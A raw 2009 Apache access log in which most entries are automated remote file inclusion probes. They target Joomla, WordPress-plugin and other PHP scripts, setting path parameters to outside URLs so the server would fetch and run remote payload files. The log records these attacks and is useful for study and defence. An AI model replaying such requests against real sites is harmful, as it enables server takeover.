91.142.209.134 - - [03/Aug/2009:00:48:59 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:48:59 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.23.205.32 - - [03/Aug/2009:00:49:05 -0400] "GET /logs/access_log.Q109052300//?option=com_banners&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:49:05 -0400] "GET //?option=com_banners&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:49:05 -0400] "GET /logs//?option=com_banners&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12143 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:49:06 -0400] "GET /logs/error_log.Q109052300//?option=com_banners&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
91.142.209.134 - - [03/Aug/2009:00:49:11 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:11 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:11 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:11 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:11 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:11 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:14 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:26 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:26 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:26 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:30 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:30 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:30 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:36 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:36 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:36 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:49:42 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:50:08 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:50:08 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:50:12 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
91.142.209.134 - - [03/Aug/2009:00:50:12 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
200.93.147.154 - - [03/Aug/2009:00:50:22 -0400] "GET //index2.php?mosConfig_absolute_path=http://h1.ripway.com/smile212/makan.txt??? HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
200.93.147.154 - - [03/Aug/2009:00:50:22 -0400] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/smile212/makan.txt??? HTTP/1.1" 404 214 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [03/Aug/2009:00:50:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.172.33.230 - - [03/Aug/2009:00:51:39 -0400] "GET /logs/error_log.Q109071400%20//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:00:51:39 -0400] "GET /logs/access_log.Q109070300%20//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
218.150.78.235 - - [03/Aug/2009:00:52:41 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
218.150.78.235 - - [03/Aug/2009:00:52:41 -0400] "GET /logs/access_log.Q109070300%20//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
218.150.78.235 - - [03/Aug/2009:00:52:41 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
218.150.78.235 - - [03/Aug/2009:00:52:41 -0400] "GET /logs/error_log.Q109071400%20//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:00:53:10 -0400] "GET /logs/error_log.Q109071400%20//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:00:53:10 -0400] "GET /logs/access_log.Q109070300%20//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
209.59.12.99 - - [03/Aug/2009:00:55:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
71.128.196.171 - - [03/Aug/2009:00:56:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
75.125.35.18 - - [03/Aug/2009:00:57:39 -0400] "GET /logs/access_log.Q109070300%20//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:00:57:40 -0400] "GET /logs/error_log.Q109071400%20//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.826"
74.200.90.19 - - [03/Aug/2009:00:58:48 -0400] "GET //?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
74.200.90.19 - - [03/Aug/2009:00:58:48 -0400] "GET /logs/access_log.Q109052100%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.200.90.19 - - [03/Aug/2009:00:58:48 -0400] "GET /logs//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0"
94.23.205.32 - - [03/Aug/2009:00:59:09 -0400] "GET /logs/access_log.Q109052300%20//?option=com_banners&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
74.200.90.19 - - [03/Aug/2009:00:59:11 -0400] "GET /logs/access_log.Q109052700%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.200.90.19 - - [03/Aug/2009:00:59:53 -0400] "GET /logs/access_log.Q109052100//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.200.90.19 - - [03/Aug/2009:01:00:04 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [03/Aug/2009:01:00:20 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://h1.ripway.com/smile212/makan.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
200.93.147.154 - - [03/Aug/2009:01:00:20 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://h1.ripway.com/smile212/makan.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.59.12.99 - - [03/Aug/2009:01:00:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.3 - - [03/Aug/2009:01:00:34 -0400] "GET //?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
77.221.130.3 - - [03/Aug/2009:01:00:34 -0400] "GET /logs/access_log.Q109052100%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.3 - - [03/Aug/2009:01:00:34 -0400] "GET /logs//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0"
78.110.50.127 - - [03/Aug/2009:01:00:36 -0400] "GET //?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.110.50.127 - - [03/Aug/2009:01:00:36 -0400] "GET /logs//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0"
78.110.50.127 - - [03/Aug/2009:01:00:37 -0400] "GET /logs/access_log.Q109052100%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:00:37 -0400] "GET //?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:00:37 -0400] "GET /logs/access_log.Q109052100%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:00:37 -0400] "GET /logs//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:01:00:38 -0400] "GET //?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:01:00:38 -0400] "GET /logs/access_log.Q109052100%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:01:00:38 -0400] "GET /logs//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:00:38 -0400] "GET //?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:00:38 -0400] "GET /logs//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:00:38 -0400] "GET /logs/access_log.Q109052100%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.60.36.242 - - [03/Aug/2009:01:00:56 -0400] "GET /modules/TotalCalendar/index.php?inc_dir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
65.60.36.242 - - [03/Aug/2009:01:00:56 -0400] "GET /logs/modules/TotalCalendar/index.php?inc_dir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
77.221.130.3 - - [03/Aug/2009:01:01:32 -0400] "GET /logs/access_log.Q109052700%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.110.50.127 - - [03/Aug/2009:01:01:34 -0400] "GET /logs/access_log.Q109052700%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:01:35 -0400] "GET /logs/access_log.Q109052700%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:01:37 -0400] "GET /logs/access_log.Q109052700%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:01:01:37 -0400] "GET /logs/access_log.Q109052700%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.71.201 - - [03/Aug/2009:01:01:39 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0057BE3369E8F2004B59041+WSEQ(S0060):1+OUITEM(A0200):5099250 HTTP/1.1" 200 27022 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.73.192.55 - - [03/Aug/2009:01:02:20 -0400] "GET /logs/access_log.Q109052100//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:02:21 -0400] "GET /logs/access_log.Q109052100//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.110.50.127 - - [03/Aug/2009:01:02:24 -0400] "GET /logs/access_log.Q109052100//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:02:36 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.221.130.3 - - [03/Aug/2009:01:02:37 -0400] "GET /logs/access_log.Q109052100//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
80.73.192.55 - - [03/Aug/2009:01:02:38 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.110.50.127 - - [03/Aug/2009:01:02:40 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:01:02:46 -0400] "GET /logs/access_log.Q109052100//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.221.130.3 - - [03/Aug/2009:01:02:47 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:01:02:53 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:03:10 -0400] "GET //?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:03:10 -0400] "GET /logs/access_log.Q109052100//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:03:11 -0400] "GET /logs/access_log.Q109052100%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:03:11 -0400] "GET /logs//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:03:11 -0400] "GET /logs//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 12143 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:03:11 -0400] "GET //?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:03:59 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:04:01 -0400] "GET /logs/access_log.Q109052700%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:04:26 -0400] "GET /logs/access_log.Q109052100%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:04:37 -0400] "GET /logs/access_log.Q109052700%20%20//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.218.5.234 - - [03/Aug/2009:01:04:47 -0400] "GET /xGB.php?act=admin&do=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
210.218.5.234 - - [03/Aug/2009:01:04:47 -0400] "GET /logs/access_log.Q109070700/xGB.php?act=admin&do=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.218.5.234 - - [03/Aug/2009:01:04:49 -0400] "GET /logs/xGB.php?act=admin&do=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
209.172.33.230 - - [03/Aug/2009:01:05:09 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:01:05:09 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:01:05:09 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:01:05:09 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.812"
64.34.176.211 - - [03/Aug/2009:01:05:10 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:01:05:10 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:01:05:10 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:01:05:11 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
210.218.5.234 - - [03/Aug/2009:01:05:14 -0400] "GET /logs/error_log.Q109061400/xGB.php?act=admin&do=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:01:05:28 -0400] "GET /logs/error_log.Q109071400%20//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:01:05:28 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:01:05:28 -0400] "GET /logs/access_log.Q109070300%20//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:01:05:28 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.826"
209.59.12.99 - - [03/Aug/2009:01:05:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.73.17.7 - - [03/Aug/2009:01:05:41 -0400] "GET /logs/access_log.Q109052100//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.73.17.7 - - [03/Aug/2009:01:06:40 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:01:07:14 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:01:07:15 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.826"
190.144.44.36 - - [03/Aug/2009:01:07:33 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:01:07:43 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:01:07:43 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:01:07:57 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.172.33.230 - - [03/Aug/2009:01:08:26 -0400] "GET /logs/access_log.Q109070300%20//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:01:08:26 -0400] "GET /logs/error_log.Q109071400%20//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
